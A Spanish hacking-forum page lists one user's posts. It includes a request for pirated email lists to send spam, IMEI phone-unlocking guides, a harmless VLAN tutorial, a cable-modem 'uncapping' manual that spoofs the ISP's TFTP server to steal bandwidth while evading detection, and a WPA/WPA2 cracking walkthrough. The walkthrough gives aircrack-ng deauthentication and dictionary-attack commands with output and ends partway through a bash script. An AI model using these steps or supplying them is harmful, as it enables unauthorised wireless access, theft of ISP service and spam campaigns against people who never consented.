Abril 19, 2014, 08:56:04 am

Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.


Temas - $ad

Páginas: [1] 2
1
Dudas Generales / Alguien conoce CD's piratas para hacer spam?
« en: Abril 22, 2011, 03:12:29 pm »
Si alguien conoce o tiene listas de correos electronicos o BD o CD's con BD de correos electrónicos por favor que los pase.

Gracias y saludo.

2
Hardware / Hirens Boot [Todas las versiones]
« en: Abril 03, 2011, 08:38:44 am »
Hirens Boot [Todas las versiones]

You are not allowed to view links. Register or Login

3
Phreak / Lee... ¿Qué son las X-SIM?
« en: Abril 03, 2011, 08:15:51 am »
¿Qué son las X-SIM?


La X-SIM es una tarjeta SIM creada por la compañía OneStopChina que sirve para desbloquear teléfonos móviles de la marca Nokia. Con ella, nos evitamos tener que pagarle a algún malandra para que nos desbloquee el equipo, sea encontrado, robado o pues solamente porque quieren cambiar de compañía.

Otra de las ventajas de utilizar la X-SIM es que no necesitamos ni cables ni softwares especiales para liberar el móvil. La X-SIM tiene el aspecto de una SIM normal y corriente, sin embargo, funciona muy diferente y permite desbloquear una gran cantidad de equipos Nokia como el 2630, 5300, 5700, 6120c, 6110 netvigator, 6500c, 6500s, N76, N95, N95 8GB, N61 8GB, E65, N73, N80, 6120c, N75, 6300, además, permite actualizar el Firmware del equipo.

Lista de compatibles:
You are not allowed to view links. Register or Login

4
Phreak / Liberar móvil via IMEI
« en: Abril 03, 2011, 07:39:35 am »
Liberar móvil via IMEI

Paso 1. Obtén el IMEI, ya sea de uno de los dos sitios anteriores o bien quitando la tarjeta SIM, enciende el móvil y teclea *#06#. Apúntalo y deja el móvil sin la tarjeta.

Paso 2. Ve a esta página web:

You are not allowed to view links. Register or Login

En ella vamos a obtener el código que necesitamos. Es una página sueca, así que conviene ponerlo en inglés.

[!Haz click sobre esta imagen para ampliarla o doble-click para ampliarlas todas in-situ!]

Hay más páginas en las que se puede hacer esto, algunas españolas, pero ésta me ha dado 100% de fiabilidad además de ser totalmente gratis. En las españolas me dieron un código erróneo, y en muchas otras al final te dicen que si quieres el código envíes un SMS bla bla bla... Ésta es gratis y es eficaz.

Paso 3. Selecciona la marca de tu móvil, el modelo, el país y la compañía que tienes. Llegarás a una pantalla como ésta, más o menos (dependerá del modelo de móvil):

[!Haz click sobre esta imagen para ampliarla o doble-click para ampliarlas todas in-situ!]

Aquí lo que tienes que hacer es meter el IMEI obtenido previamente en el lugar indicado. Escríbelo todo seguido, sin espacios. El resto dejarlo tal y como aparezca (el Box serial y demás), salvo poniendo un tick en la casilla del "Agree".

Paso 4. Os aparecerá una pantalla como ésta:

[!Haz click sobre esta imagen para ampliarla o doble-click para ampliarlas todas in-situ!]

En ella aparecen a la derecha un montón de códigos. Pues bien, el último (el séptimo) es el que debeis utilizar. Debeis introducirlo en el móvil SIN TARJETA. Para obtener la "p" la "w" y el "+" hay que pulsar la tecla "*" varias veces. Una vez que hayais introducido el código entero os debería aparecer un mensaje diciendo algo como "restricción eliminada" o similares.

AVISO. Para introducir el código correcto hay 5 intentos, así que revisar bien el IMEI y todos los datos. Si el código número 7 no funciona usad el primero, y si ninguno de los dos lo hacen mirad bien que posiblemente habréis metido un número mal. En ningún caso llegueis a los 5 intentos pues entonces el móvil será imposible de liberar.

You are not allowed to view links. Register or Login

5
Phreak / Móviles para liberar via IMEI
« en: Abril 03, 2011, 07:36:40 am »
- ALCATEL: Modelos HC-800, HC-1000 y Hx1 (estos ultimos son los antiguos One Touch monobanda, los que están por detras de los modelos db).

- NOKIA: Cualquier nokia puede ser liberado en la actuliadad por imei. Sea el que sea, el más antiguo al más moderno.
NOKIA:1100,1100a,1100b,1101,2300,3100,3100b,3105,3 108,3120,3200,3200b,
3300,3350,3510,3510i,3520,3530,3560,3570,3585,3585 i,3586,3586i,3588,3588i,
3590,3590e,3595,3595e,3610,3650,5100,5100e,6100,61 00e,6108,6200,6200e,
6220,6225,6310,6310i,6310e,6340,6340i,6340e,6360,6 370,6385,6390,6500,
6510,6510e,6560,6585,6590,6590i,6590e,6610,6610e,6 620,6650,6800,6800e,
6810,6820,7200,7210,7210e,7210i,7250,7250i,7250e,7 700,8310,8310i,8310e,
8390,8390e,8510,8510e,8910,8910i,8910e,9210,

640,650,1220,1260,1261,2100,2146,2160,2160i,2170,2 180,2190,
2260,2270,2285,3210,3260,3285,3310,3310e,3315,3320 ,3330,3350,
3360,3361,3365,3390,3390b,3395,3410,3610,3810,5110 ,5110i,5120,5120i,5125
5130,5140,5146,5148,5160,5165,5170,5170i,5180,5185 ,5185i,5190,5210,5510,
6090,6110,6110i,6120,6120i,6130,6138,6150,6150e,61 60,6160i,6161,6162,
6170,6185,6188,6190,6210,6210e,6250,6290,7110,7160 ,7190,72xx,73xx,8210,
8250,8260,8265,8265i,8270,8280,8290,8810,8850,8855 ,8860,8890,9000,9000i,
9110,9110i,9210,9210e,9210e,9290,nk402,nk503,nk702 ,ringo
Nokia 1100, , 1110, 1260, 1600, 2100, 2160, 2170, 2180, 2190, 2220, 2260, 2270, 2280, 2300, 2600, 2650, 3100, 3120, 3200, 3210, 3220, 3230, 3285, 3300, 3310, 3315, 3320, 3330, 3350, 3360, 3390, 3395, 3410, 3510, 3520, 3530, 3560, 3570, 3590, 3600, 3610, 3620, 3650, 3660, 3810, 5100, 5110, 5120, 5125, 5130, 5140, 5146, 5160, 5190, 5210, 5510, 6020, 6030, 6090, 6100, 6101, 6102, 6108, 6110, 6111, 6120, 6130, 6138, 6150, 6160, 6161, 6162, 6170, 6185, 6190, 6200, 6210, 6220, 6225, 6230, 6250, 6260, 6310, 6340,6360, 6370, 6500, 6510, 6560, 6590, 6600, 6610, 6620, 6650, 6660, 6670, 6800, 6810, 6820, 7110, 7160, 7190, 7200, 7210,7210, 7210i, 7250, 7250, 7250i, 7260, 7270, 7280, 7600, 7610, 7650, 7700, 7710, 8210, 8250, 8260, 8265, 8270, 8280, 8290, 8310, 8390, 8510, 8800, 8810, 8850, 8855, 8860, 8890, 8910, 9000, 9110, 9210, 9290, N-gage and N-gage QD.

Excepto Nokia 2310,2610,5200, 6125, 6131, 6151, 6234, 6280, 6630, 6650,6680, 7370, 7380, E50, E60,E61, N70, N71,N72,N73,N75,N80, N90, N91,N92,N93,N95 que no pueden ser liberados por imei GRATIS en la actualidad

- LG: Modelos 1200, 1300, 510, 520, 510W, 7010, 7020, B1200, B1300, G510, M1200, M1300, W3000, C1200, G3000, G5200 y W5200.

- NEC: Modelos C313, C316, E606, E613, E616, E808.

- SAMSUNG: Modelos A300, A400, A800, E500, E700, E715, M100, P400, S100, S105, S300, S307, S500, SGH-600, SGH-2100, V200, X100, X600.

- SIEMENS: Modelos 8008, CL50, CL55, ST55.

- SONY: Modelos CMD-C1, CMD-CD5 (no confundir con Sony Ericsson)

- PANASONIC: Modelos G50, GD50, G51, GD55.

6
Bugs y Exploits / [Seguridad Informatica] Sec-Track
« en: Mayo 17, 2010, 12:26:21 pm »


Sec-Track es un proyecto colaborativo que ofrece un repositorio de recursos relacionados con la implementación y desarrollo de laboratorios de entrenamiento e investigación sobre Seguridad Informatica. Estos recursos son distribuidos por medio de entornos virtualizados que asemejan entornos reales, dichos entornos pueden ser implementados en diferentes ambientes de capacitación e investigación.

Sec-Track ofrece también un amplio repertorio de instrucciones para la implementación de entornos de virtualización, con la finalidad de que cada interesado en implementar uno de los laboratorios y/o entornos disponibles pueda hacerlo simplemente siguiendo dichas instrucciones.

Sec-Track pone a disposición la documentación base para el desarrollo de entornos virtualizados por parte de los usuarios inscritos. Estos serán publicados en Sec-Track y cualquier persona, organización o entidad podrá descargarlos y tratar de cumplir con los objetivos propuestos por sus desarrolladores.

Otro de los objetivos de Sec-Track es ofrecer un espacio colaborativo en el cual, las diferentes comunidades y usuarios puedan publicar sus propios entornos de entrenamiento, retos y pruebas en cualquiera de las diferentes temáticas, con la finalidad de que las demás comunidades puedan descargarlos e implementarlos para buscar una solución al mismo, pero aun más importante generar la respectiva documentación de dicho proceso.


¿Cuáles son las temáticas que abarca Sec-Track?
Sec-Track tratará de cubrir cada una de las temáticas relacionadas con la seguridad informática. Por ahora ofrecemos los siguientes campos de acción:

    * Test de Penetración
    * Análisis de Malware
    * Criptografía
    * Aseguramiento (Hardening)
    * Ingeniería Inversa
    * Informática Forense
    * Gobierno IT


¿Cómo funciona Sec-Track?
Sec-Track es un proyecto colaborativo. Por lo tanto espera ser autosostenible a nivel de contenido y publicaciones.

Esto quiere decir que se publicarán una serie de entornos, retos, pruebas, wargames, etc. y estos deben ser solucionados por sus propios usuarios (comunidades, grupos de estudio e investigación, empresas, listas de seguridad, etc.)

La finalidad es que alguno de estos grupos publique la respectiva documentación (papers, video tutoriales, audios) de como realizó dicho proceso.

Si uno de estos grupos tiene una nueva propuesta basada en los entornos publicados o sobre nuevos entornos (aseguramiento, análisis forense, aumento de complejidad de las técnicas utilizadas) puede utilizar el formulario de contacto y enviar estas ideas para que sean implemetadas en Sec-Track.

Fuente: You are not allowed to view links. Register or Login

7
Redes / [Tutorial] Redes [VLAN] {Que son y como crearlas}
« en: Mayo 08, 2010, 11:59:29 am »
VLan´s para newbies por Han

Bueno cuando estaba comenzando en esto de las redes este fue uno de los temas que mas me sorprendio ( obvio estaba comenzando )

 Vlan significa: Virtual Lan , en otras palabras podemos configurar varias Lan (virtuales) en una sola "Lan" (fisica) ... una imagen es mejor que 1000 palabras.

tenemos esta topologia de red fisicamente (imagen 1) :

1 SW Cisco ( Imagen 2 )( Main SW - puede ser cualquier otra marca, lo que importa es que sea administrable)
8 Equipos que pertenecen cada uno a un departamento (Ingenieria , logistica, administrativo)
todos los vamos a conectar al mismo SW (Imagen 2)

Imagen 1

Imagen 2



ahora comenzamos a conectar y configurar las IP de cada equipo ( Imagen 3 y 4)


Imagen 3


Imagen 4


Listo tenemos la infraestructura Fisica de la imagen 5
Imagen 5

Diagrama 1

Departamento Ingenieria
 Desarrollador ----------- 10.0.0.1
 Ing Storate -------------- 10.0.0.2
 Aux Ingenieria ---------- 10.0.0.3

Departamento Logistica
 Logistica 1 ---------------10.0.0.4
 Logistica 2 --------------- 10.0.0.5

Departamento Administravito
 Admisnitrativo 1 ----------- 10.0.0.6
 Admisnitrativo 2 ----------- 10.0.0.7
 Admisnitrativo 3 ----------- 10.0.0.8



pero lo que vamos a lograr tener con la configuracion que vamos a hacer es algo como esto ( imagen 6)

Imagen 6

Osea estamos emulando 3 Lan ( Virtuales) con 1 solo SW fisico ... como se logra esto ?? modificando las propiedades del SW.

Para esto nos conectamos al SW por un cable de consola ( que en simulador es IOS Command) y entramos al SW.

este simulador es tan preciso que cuando ingresamos a el SW nos muetra lo que en realidad nos mostraria nuestro pc al acceder al SW que seria esto :

Código: You are not allowed to view links. Register or Login
C2950 Boot Loader (C2950-HBOOT-M) Version 12.1(11r)EA1, RELEASE SOFTWARE (fc1)
Compiled Mon 22-Jul-02 18:57 by miwang
Cisco WS-C2950-24 (RC32300) processor (revision C0) with 21039K bytes of memory.
2950-24 starting...
Base ethernet MAC Address: 00D0.584E.B340
Xmodem file system is available.
Initializing Flash...
flashfs[0]: 1 files, 0 directories
flashfs[0]: 0 orphaned files, 0 orphaned directories
flashfs[0]: Total bytes: 64016384
flashfs[0]: Bytes used: 3058048
flashfs[0]: Bytes available: 60958336
flashfs[0]: flashfs fsck took 1 seconds.
...done Initializing Flash.

Boot Sector Filesystem (bs:) installed, fsid: 3
Parameter Block Filesystem (pb:) installed, fsid: 4


Loading "flash:/c2950-i6q4l2-mz.121-22.EA4.bin"...
########################################################################## [OK]
              Restricted Rights Legend

Use, duplication, or disclosure by the Government is
subject to restrictions as set forth in subparagraph
(c) of the Commercial Computer Software - Restricted
Rights clause at FAR sec. 52.227-19 and subparagraph
(c) (1) (ii) of the Rights in Technical Data and Computer
Software clause at DFARS sec. 252.227-7013.

           cisco Systems, Inc.
           170 West Tasman Drive
           San Jose, California 95134-1706



Cisco Internetwork Operating System Software
IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(22)EA4, RELEASE SOFTWARE(fc1)
Copyright (c) 1986-2005 by cisco Systems, Inc.
Compiled Wed 18-May-05 22:31 by jharirba

Cisco WS-C2950-24 (RC32300) processor (revision C0) with 21039K bytes of memory.
Processor board ID FHK0610Z0WC
Running Standard Image
24 FastEthernet/IEEE 802.3 interface(s)

63488K bytes of flash-simulated non-volatile configuration memory.
Base ethernet MAC Address: 00D0.584E.B340
Motherboard assembly number: 73-5781-09
Power supply part number: 34-0965-01
Motherboard serial number: FOC061004SZ
Power supply serial number: DAB0609127D
Model revision number: C0
Motherboard revision number: A0
Model number: WS-C2950-24
System serial number: FHK0610Z0WC

Cisco Internetwork Operating System Software
IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(22)EA4, RELEASE SOFTWARE(fc1)
Copyright (c) 1986-2005 by cisco Systems, Inc.
Compiled Wed 18-May-05 22:31 by jharirba

Press RETURN to get started!


%LINK-5-CHANGED: Interface FastEthernet0/1, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/1, changed state to up
%LINK-5-CHANGED: Interface FastEthernet0/2, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/2, changed state to up
%LINK-5-CHANGED: Interface FastEthernet0/3, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/3, changed state to up
%LINK-5-CHANGED: Interface FastEthernet0/4, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/4, changed state to up
%LINK-5-CHANGED: Interface FastEthernet0/5, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/5, changed state to up
%LINK-5-CHANGED: Interface FastEthernet0/6, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/6, changed state to up
%LINK-5-CHANGED: Interface FastEthernet0/7, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/7, changed state to up
%LINK-5-CHANGED: Interface FastEthernet0/8, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/8, changed state to up

Listo ahora le decimos a el SW que queremos entrar en el modo "habilitado" que seria enable en ingles, para esto le damos el siguiente comando

Código: You are not allowed to view links. Register or Login
Switch>enable
y con esto entrara al modo "habilitado" , ahora vamos a ver que Vlan tiene el SW por defecto, para esto damos el comando :

Código: You are not allowed to view links. Register or Login
Switch#show vlan
y con esto nos mostrata la imagen 7

PD1: notese que cuando se cambia de un prom a otro cambia de caracter, al principio estaba " Switch>" y ahora esta "Switch#"

Imagen 7

la imagen 7 nos dice algo muy importante y es que por defecto el SW ya utiliza el concepto de vlan, notemos que todas las interfaces estan en la vlan1 osea que todos los puertos fisicos del SW corresponden a sola 1 LAN virtual, es esta la razon por la cual los equipos por defecto pueden comunicarse entre si, sin necesidad de hacer ninguna configuracion sobre el SW

PD2: El SW tiene 24 puertos fisicos , donde la interface FastEthernet 0/1 del que nos hablaran mas adelante corresponde al puerto 1 fisico del SW, osea el hueco numero 1 donde podemos poner un cable de red (mirar imagen 2)

Listo sabiendo esto ahora, vamos a proceder a crear mas Vlan ( las 3 vlan que queremos ), para esto en el mismo modo en que estamos ingresamos el comando

Código: You are not allowed to view links. Register or Login
vlan database
con este comando ingresaremos a la base de datos de las vlans para poder crear y modificarlas, para crear una nueva vlan damos el comando

Código: You are not allowed to view links. Register or Login
vlan 2 name Ingenieria
donde 2 es el numero consecutivo de la vlan que queremos crear, como la vlan 1 ya existe ( por defecto) usamos la 2 y donde ingenieria coresponde a un nombre descriptivo para la vlan

nos quedara algo asi (imagen 8)

Imagen 8

con esto ya hemos creado las 2 Lan virtuales que queremos para segmentar la red fisica que tenemos (usaremos la vlan2 para ingenieria, la vlan3 para logistica y la vlan1 por defecto para administrativo).

con esto solo le hemos dicho al SW que tenemos 3 Lan virtuales, pero ahora como le decimos que el equipo 1 corresponde a la vlan 2, pues sencillo, ingresamos a un modo ahora llamado "configuracion de terminal" y le diremos a cada interface del SW a que vlan corresponde (recuerda que la interface corresponde a el puerto fisico del SW (imagen 2))

para ingresar al modo configuracion de terminal tecleamos

Código: You are not allowed to view links. Register or Login
configure terminal
y el prom quedara asi

Código: You are not allowed to view links. Register or Login
Switch(config)#
ahora desde este modo ingresaremos a la interface Fast Ethernet 0/1 ( corresponde a el puerto fisico 1 del SW donde esta conectado el equipo 1 del departamento de ingenieria) y le diremos que ese puerto pertenece a la vlan 2

comandos

Código: You are not allowed to view links. Register or Login
Switch(config)#interface fastEthernet 0/1
el prom quedara asi

Código: You are not allowed to view links. Register or Login
Switch(config-if)#
y luego le diremos que el puerto es de modo aceso

Código: You are not allowed to view links. Register or Login
Switch(config-if)#switchport mode access
y por ultimo le diremos que pertenece a la vlan2

Código: You are not allowed to view links. Register or Login
Switch(config-if)#switchport access vlan 2
y asi susecivamente para todas las interfaces ( mirar imagen 9)

Imagen 9

listo ya tenemos nuestras vlans creadas y los puertos asignados, miremos como lo muestra de nuevo el SW.

vamos a el modo enable de nuevo (desde el modo configuracion de terminal no se puede mirar esto)

y damos el comando

Código: You are not allowed to view links. Register or Login
show vlan
y nos mostrata las vlan y los puertos asignados (comparar imagen 10 con imagen 7)

imagen 10


y ahora probaremos la configuracion hacindo ping entre los equipos, y esto es lo que deberia de pasar

departamento de ingenieria debe tener conectividad entre si, pero no puede tener con logistica ni con administrativo

osea las IP de Ingenieria deberia tener respuesta ( ping) entre ellos pero no con ninguna IP de otro departamento ( Mirar diagrama 1 ... arriba )


Imagen 11

notemos que estoy haciendo la prueba sobre el equipo desarrollador (perteneciente a el departamento ingenieria y que tiene IP 10.0.0.1) y este equipo puede ver a sus compañeros 10.0.0.2 y 10.0.0.3, pero no puede ver a el equipo 10.0.0.4 ni al 10.0.0.5 (logistica ... request time out) ni tampoco puede ver a los de la vlan1 (administrativo)


CONCLUCION: tenemos 3 redes virtualmente separada en 1 solo SW fisico.


Autor: Han
Fuente: CPH

8
Redes / Manual Uncapping
« en: Mayo 08, 2010, 11:52:38 am »
Este texto no fue invencion mia, mas bien fue una traduccion de varios textos encontrados en la web de  You are not allowed to view links. Register or Login yo los traduje y lo recopile en este pequeño texto :-)

Antes que otra cosa se estaran preguntando ¿que demonios es el uncapping?, bueno en la traduccion al español seria algo asi como "destapar", nuestro modem nada mas y nada menos!! si alguna vez has soñado con acelerar tu conexion por cable a velocidades como 2mbps con este texo es posible!.

Advierto que la tecnica que describo a continuacion es con fines educativos ;-) y el que escribe esto no se hace resonsable de los usos no apropiados que se le pueda dar a esta informacion...

IntrducCion! Cada vez que encedemos nuestro modem este se conecta de forma automatica al TFTP(Trivial Transfer Protocol)de nuestro ISP y pide nuestro archivo de configuracion por lo general llamado "384kbps.cm" en mi caso asi se llama ya q mi conexion es a esa velocidad, este mismo archivo controla la velocidad de nuestra conexion, y nuestro objetivo es pillarlo, modificar sus valores y subirlo de nuevo al TFTP asi podremos cambiar nuestra velocidad sencillo no! ;-)

¿Como hacerlo? Dirigete a You are not allowed to view links. Register or Login
Y descargate los TCniSo steps 1,2,3,5 Ahora lo que tienes que hacer es seguir los siguientes pasos:


1) Abre el programa TCNiso step 1 y picale en donde dice "Star Query", esto generara un archivo donde se guardaran los datos necesarios para llevar a cabo el siguiente paso.

2)Bajate el archivo de configuracion de tu ISP con el TCNiso step 2, no olvides poner este programa en la misma carpeta que el anterior, ejecutalo y descargaras el archivo de configuracion que puede llamarse 64kbps_pc01.bin o 384kbps.cm (en mi caso asi se llama).

3)Abre el archivo que bajaste con el programa DocSiS32 Pro o con el ConfigEdit, igual los bajas de la web q te di antes. Un archivo de configuracion se ve mas o menos asi...(recuerda que depende mucho de tu ISP la estructura pero imagino que no cambia mucho)

Main {
DownstreamFrequency 435000000;
UpstreamChannelId 0;
NetworkAccess 1;
ClassOfService {
ClassID 1;
MaxRateDown 384000;
MaxRateUp 64000;
}
MaxCPE 1;
/* EndOfDataMarker */
/* Pad */


Aqui lo unico que modificaremos es el MaxRateDown (que es la velocidad de download)por la velocidad que nosotros queramos por ejemplo si quisieramos acelerarla a 512kbps seria MaxeRateDown 512000 y la de MaxRateUp que es la velocidad de upload. Trata de no poner numero enormes porq tu ISP podria darse cuenta y te meterias en un buen lio... :-(

Guarda este archivo en otra carpeta pero con el mismo nombre y extension, que el archivo original.

4)Bueno ahora es tiempo de configurar tu PC:

*Si eres usuario de Win98 o WinMe deberas deshabilitar tu tarjeta de red para hacer este paso, esto es para evitarse estar reiniciando la PC q hueva :-@!, para deshabilitar tu tarjeta de red: da click derecho en Mi Pc-->Administrador de Dispositivos-->Buscas tu modem-->Propiedades-->Deshabilitar este perfil de Hardware, ahora ya deshabilitada te vas a las propiedades de la Red en el Panel de Control (no me pregunten como hacerlo eso es basico!)y modificamos los siguientes valores:

+Nuestra direccion IP la cambiamos por la direccion del DHCP server esta la podemos averiguar AQUI

+Mascara de Subred: 255.255.255.0

+Puerta de enlace: 192.168.100.1 que es la ip de nuestro ETHERNET.

Terminando esto le dan aceptar, y si les pide reiniciar lo ponen que no, en vez de esto vuelven a habilitar la tarjeta de red con los mismo pasos q describi antes solo a ahora la habilitan sencillo! bien pasemos al paso 5

5)Bueno ahora ejecutaremos el TFTP Server tambien lo descargas de la pagina q te di, aqui solo le das la ruta de donde guardaste el archivo modificado (el 384kbps.cm o como se llame), despues de esto le quitas la corriente al modem o lo desconectas es lo mismo y activas el TFTP Server, te esperas unos 15 seg y vuelves a conectar el modem, veras q despues q se ponga online el modem habras enviado el nuevo archivo de configuracion, en pocas palabras lo que hicimos fue hacerle creer al modem que el servidor era nuestra maquina jeje ;-) NOTA: Aveces en el programa veras todo negro debido a q el fondo y las letras son del mismo color asi q seleccionandolas con el mouse resolveras este problema...Cuando hayas visto q se mando el archivo cierras el TFTP server y vamos al sexto y ultimo paso!!

6)Ahora solo debemos regresar los valores del IP y todo eso a como estaban, (ANTES DESACTIVA TU TARJETA DE RED) Direccion IP "Obtener una direccion IP automaticamente", elimina la puerta de enlace , la mascara de Subred a como estaba :-p ...Ahora activa tu Tarjeta de Nuevo y listo acabas de hacer el unNcaPpinG! creo que notaras el cambio de velocidad...

Bueno es todo por ahora espero que este pequeño texto les haya servido, una vez mas aclaro esta fue una traduccion y recopilacion de textos encontrados en la web...

_________________________________________

Antes de cloncluir este manual, quería comentaros mi problemilla, pues que me bloqueo en el paso 2, cuando abro el TCNiSOStep2.exe, le doy al enlace de "GET FILE", me da error, y no me crea el archivo de configuración, y sin el archivo de configuración no se puede hacer el Uncapping, jeje, me podrían echar un cable (nunca mejor dicho xD).

Autor: hello
You are not allowed to view links. Register or Login

9
Seguridad Wireless / Cracking WPA/WPA2-PSK
« en: Mayo 07, 2010, 05:04:55 pm »

-[ INFORMACIÓN ]---------------------------------------------------------------------

   Titulo: Cracking WPA/WPA2-PSK with wordlist
   Autor: ka0x
   Contacto: ka0x01[alt+64]gmail.com
   Fecha: 08/03/2009

---------------------------------------------------------------------------------


-[ ÍNDICE ]---------------------------------------------------------------------

   0x01: Introducción
   0x02: ¿Qué es el handshake?
   0x03: Capturando handshake
   0x04: Conseguir clave con diccionario
   0x05: airoWPA-PSK.sh
   0x06: Fin


---------------------------------------------------------------------------------


---[ 0x01: Introducción ]

En este pequeño texto se explicará como obtener la clave de una red inalámbrica con cifrado WPA/WP2
en la que se esté usando un sistema de clave compartida (pre-shared keys - PSK).
Para todo esto necesitaremos capturar un handshake y después con un diccionario atacar al handshake
para obtener la clave.

Imaginemos que en este caso tenemos la siguiente red inalambrica:

- ESSID: ap_labs
- BSSID: 00:1B:02:93:AF:9C
- CANAL: 1
- CLIENTE: 01:C2:B3:04:02:05


---[ 0x02: ¿Qué es el handshake? ]

Pues el handshake se genera cuando un cliente se asocia a la red inalámbrica,
es como un saludo (apretón de manos) entre el punto de acceso y el cliente.
Son los paquetes que se envían entre el AP y el cliente en el momento de la asociación.
para que podamos empezar el ataque con diccionario en una red con cifrado WPA-PSK, necesitaremos haber
capturado estos paquetes.

---------------------------------------------------------------------------------



---[ 0x03: Capturando handshake ]

Bueno empecemos...
Utilizamores la suite de aircrack-ng,  si queremos los sources y demás
podemos entrar a su web: You are not allowed to view links. Register or Login

Si utilizamos debian, encontraremos el paquete en los repositorios, instalar:
Código: You are not allowed to view links. Register or Login
# apt-get install aircrack-ng
Para poder capturar paquetes, tendremos que poner nuestro adaptador wireles en modo monitor:

Código: You are not allowed to view links. Register or Login
# airmon-ng start <iface>
p.e: # airmon-ng start wlan0


Siempre se necesitará tener un cliente 'real' asociado en el AP.
Entonces una vez para empezar a capturar paquetes, utilizaremos airodump-ng:

Código: You are not allowed to view links. Register or Login
# airodump-ng --bssid 00:1B:02:93:AF:9C -c 1 -w redWPA wlan0
--bssid -> MAC del punto de acceso.
-w redWPA -> guardará los datos obtenidos en el archivo "redWPA".
-c -> Canal del punto de acesso
wlan0 -> interfaz adaptador inalambrico.

Así capturaremos todo lo que pase por el punto de acceso con MAC: 00:1B:02:93:AF:9C
Entonces vayamos a capturar el handshake...


Como habíamos dicho antes el handshake se genera en el momento que un cliente se asocia al AP.
Entonces, cómo hacemos que se vuelva asociar el cliente al AP?

Facil, desautenticaremos al cliente del AP y esperamos a que se vuelva asociar,
para este proceso usaremos el ataque 0 de aireplay-ng. Este ataque enviará al cliente paquetes de
desautenticacion

Uso:
Código: You are not allowed to view links. Register or Login
# aireplay-ng -0 5 -a <MAC_AP> -c <MAC_CLIENTE> <interfaz>
|-> Numero de desautenticaciones que se enviarán.
     Si ponemos un 0, enviará desautenticaciones hasta que lo paremos.

En este caso:
Código: You are not allowed to view links. Register or Login
# aireplay-ng -0 15 -a 00:1B:02:93:AF:9C -c 01:C2:B3:04:02:05 wlan0
Cuando ejecutemos esto segun el numero de desautenticaciones nos aparecerá algo así:
Sending DeAuth to station   -- STMAC: [01:C2:B3:04:02:05]

En el momento que el cliente se desasocie y se vuelva a asociar al AP, nosotros con el airodump-ng
capturaremos el handshake.

¿Cómo sabemos que ya lo hemos capturado?

Pues en la ventana donde tenemos corriendo el airodump-ng, arriba a la derecha, veremos algo así:
CH 1 ] [ Elapsed: 14 mins ][ 2009-03-08 ][ WPA handshake: 00:1B:02:93:AF:9C

Una vez que nos aparezca eso, ya podemos cerrar todo, en el archivo redWPA-01.cap ya tendremos
el dichoso handshake =)

---------------------------------------------------------------------------------


---[ 0x04: Conseguir clave con diccionario ]


Una vez teniendo el handshake, ya podemos utilizar un diccionario de posibles claves
para que aircrack-ng compruebe haber si alguna de las claves del diccionario coincide
con la del AP.

¿Qué diccionario usar? pues el de john the ripper, alguno propio, hay muchos...
aunque se supone que esto es para comprobar la seguridad de tu red wireless y ya te tendrás
que saber de sobra tu clave.

La clave pre-compartida puede tener un tamaño de 8 a 63 caracteres.

Empecemos...

Si ejecutamos:
Código: You are not allowed to view links. Register or Login
# aircrack-ng redWPA-01.cap
Podremos ver que tenemos un handshake:

---------
Código: You are not allowed to view links. Register or Login
Opening wpa-hand.cap
Read 553 packets.

   #  BSSID              ESSID                     Encryption

   1  00:1B:02:93:AF:9C  ap_labs                WPA (1 handshake)  <------

Choosing first network as target.

Opening wpa-hand.cap
Please specify a dictionary (option -w).


Quitting aircrack-ng...
---------

Uso de aircrack-ng con diccionario:
Código: You are not allowed to view links. Register or Login
# aircrack-ng -w <ruta_diccionario> <archivo_de_capturas>

Suponiendo que nuestro archivo de datos capturados donde se encuentra el handshake se llama
redWPA-01.cap, lo ejecutaremos de la siguiente forma:

Código: You are not allowed to view links. Register or Login
# aircrack-ng -w diccionario.lst redWPA-01.cap
Entonces aquí ya aircrack-ng se pondrá a comprobar las posibles claves del diccionario hasta obtenerla.
Una vez obtenida, nos aparecerá lo siguiente:

---------

                                 
Código: You are not allowed to view links. Register or Login
Aircrack-ng 1.0 rc1


                   [00:00:00] 0 keys tested (0.00 k/s)


                           KEY FOUND! [ clave__ap ]


      Master Key     : 18 D4 E8 70 A0 B5 D2 26 4C 61 BA 85 5F 36 8F D9
                       DA 56 2A D2 51 B6 01 B6 A9 E8 61 B3 CD 92 7D 09

      Transcient Key : DA 5E 56 09 35 9E 2D 9F 35 B0 C5 9E A9 41 71 B5
                       8A 8C B6 1B B5 A0 D2 C0 53 47 C6 05 CC 2C CA C0
                       C7 41 04 B2 F5 7D 44 DF 71 C5 11 78 5D DE A1 D0
                       F9 2E BE 54 22 46 82 24 35 91 7E 93 21 9D BF 78

      EAPOL HMAC     : 6A 31 F7 C0 C8 A7 83 37 50 FD 44 C3 8C 7D 2B 26

---------

Hay ya vemos que encontro la clave y que es 'clave__ap'.
Como vemos el proceso de obtener una clave WPA/WPA2-PSK no es tan dificil siempre y cuando
sepamos nuestra clave, ya que si no la sabríamos este proceso podría durar horas, dias e incluso semanas
depende el diccionario que usemos.

---------------------------------------------------------------------------------



---[ 0x05: airoWPA-PSH.sh ]

Para simplificar un poco este proceso de obtención de la clave, hice un pequeño script en bash
sencillo que te puede servir si eres un poco vago :P

<-----------------airoWPA-PSK.sh--------------------->
Código: You are not allowed to view links. Register or Login
#!/bin/bash

# airoWPA-PSK.sh v0.1
# written by ka0x <ka0x01[at]gmail.com>

if [ $UID != 0 ]; then
echo "[!] NECESITAS EJECUTAR EL SCRIPT $0 CON PRIVILEJIOS DE SUPERUSUARIO"
exit
fi

comprueba_mac(){
if [ ! "${#1}" -eq "17" ]; then
echo -e "\033[31mMac Incorrecta\n\033[0m"
exit
fi
}
interfaces() {
echo -e "\n\033[31m[*] Seleccione la interfaz que va a utilizar: \033[0m\n"
INTERFACES=$(iwconfig | grep ESSID | awk '{ print $1 }')
